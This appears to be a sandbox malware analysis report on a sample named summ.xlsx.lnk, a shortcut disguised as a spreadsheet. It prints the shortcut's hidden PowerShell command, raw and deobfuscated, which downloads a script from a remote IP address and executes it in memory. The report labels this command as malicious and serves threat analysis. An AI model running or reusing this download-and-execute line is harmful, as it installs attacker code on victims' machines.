Characteristics
90cbc89aa332c6b21906a3e6a6ec1827 (7.42 KB)
No malware configuration was found at this point.
Artefacts

Name: LNK: Command Execution
Value:

powershell.exe -w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'; $r.Open('GET', 'http://46.161.0.94/mirmLAT/departuredishwasher.ps1', $false); $r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell'); $r.Send(); . ([ScriptBlock]::Create($r.ResponseText))

Malicious
Location: 90cbc89aa332c6b21906a3e6a6ec1827 > summ.xlsx.lnk

Name: Deobfuscated PowerShell
Value:

-w "Hidden" $r "=" "New-Object" -ComObject "WinHttp.WinHttpRequest.5.1" $r."Open"("GET", "http://46.161.0.94/mirmLAT/departuredishwasher.ps1", $false) $r."SetRequestHeader"("User-Agent", "UA WindowsPowerShell") $r."Send"() . ([ScriptBlock]::"Create"($r."ResponseText"))

Malicious
Location: 90cbc89aa332c6b21906a3e6a6ec1827 > summ.xlsx.lnk > LNK CommandLine
